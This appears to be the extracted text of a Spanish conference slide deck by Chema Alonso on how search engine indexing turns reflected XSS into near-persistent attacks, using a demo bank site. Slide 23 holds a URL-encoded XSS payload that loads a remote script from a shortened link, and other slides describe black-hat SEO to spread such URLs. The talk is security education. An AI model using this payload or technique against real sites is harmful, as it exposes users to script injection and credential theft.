Download - Ataques XSS Google Persistentes
![Page 1: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/1.jpg)
Ataques XSS Google Persistentes
Chema Alonso
![Page 2: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/2.jpg)
Buscadores como Arma
Búsqueda de informaciónBúsqueda de vulnerabilidades
Distribución de malwareEjecución de comandosAtaques XSS
![Page 3: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/3.jpg)
Búsqueda de información
![Page 4: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/4.jpg)
Búsqueda de passwords
![Page 5: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/5.jpg)
Distribución de malware en Apple.com
![Page 6: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/6.jpg)
BrowserShots
![Page 7: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/7.jpg)
Caché de ataques SQL
![Page 8: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/8.jpg)
Servicios de PING
![Page 9: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/9.jpg)
Análisis Forense
![Page 10: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/10.jpg)
XSS Persistentes Se inyectan en el repositorio de datos de la
aplicación Bases de datos Correos Web
Tienen cierto nivel de complejidad Tienen que ocultarse a los ojos de los
administradores Están en los datos Pueden tener consecuencias inesperadas
![Page 11: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/11.jpg)
XSS No Persistentes
![Page 12: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/12.jpg)
¿Cómo se descubren?
PentestingAcunetix free-editionEl blog de Eduardo Abril Just Googling
![Page 13: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/13.jpg)
FBI y sus XSS
![Page 14: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/14.jpg)
NASA y XSS
![Page 15: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/15.jpg)
Dominio .mil
![Page 16: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/16.jpg)
Oracle
![Page 17: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/17.jpg)
![Page 18: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/18.jpg)
«Last-minute» XSS
![Page 19: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/19.jpg)
Scripts de Búsqueda
![Page 20: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/20.jpg)
The Facts Google Indexa URLs con XSS Un alto porcentaje de usuarios llega por
buscadores
![Page 21: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/21.jpg)
The Facts…
Bueno… «buscadores means Google»
![Page 22: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/22.jpg)
Conclusión Se puede dar de alta una URL con un XSS no
persistente Servicio de alta de URLs Enlazado en una web indexada
Se puede posicionar con técnicas Black SEO
![Page 23: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/23.jpg)
Bank Of Maligno Web «copia» de Bank of América XSS No Persistente en search.aspx URL de ataque:
http://bankofmaligno.informatica64.com/search.aspx?S=%22%68%6F%6C%61%3C%73%63%72%69%70%74%20%66%6F%72%3D%77%69%6E%64%6F%77%20%65%76%65%6E%74%3D%6F%6E%6C%6F%61%64%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%74%2E%6C%79%2F%64%63%73%65%4E%49%22%3E%3C%2F%73%63%72%69%70%74%3E
Dada de alta en Google & Bing manualmente Dada de alta en Blog «Un informático en el
lado del mal»
![Page 24: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/24.jpg)
Bank Of Maligno
![Page 25: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/25.jpg)
Bank Of Maligno
![Page 26: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/26.jpg)
Bank Of Maligno
![Page 27: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/27.jpg)
Conclusiones No hay filtrado de URLs
Ataques SQL Injection Ataques XSS
Indexar un XSS en Google (u otro buscador) es convertirlo en un % Persistente
Protección SEO + Protección robots.txt
![Page 28: Ataques XSS Google Persistentes](https://reader031.vdocuments.net/reader031/viewer/2022020105/557894bbd8b42aaf518b48f4/html5/thumbnails/28.jpg)
¿Preguntas? Chema Alonso
[email protected] http://twitter.com/chemaalonso http://www.informatica64.com
Blogs http://www.elladodelmal.com http://www.windowstecnico.com http://www.seguridadapple.com http://www.forefront-es.com http://www.puntocompartido.com/blogshare http://www.exchangespain.com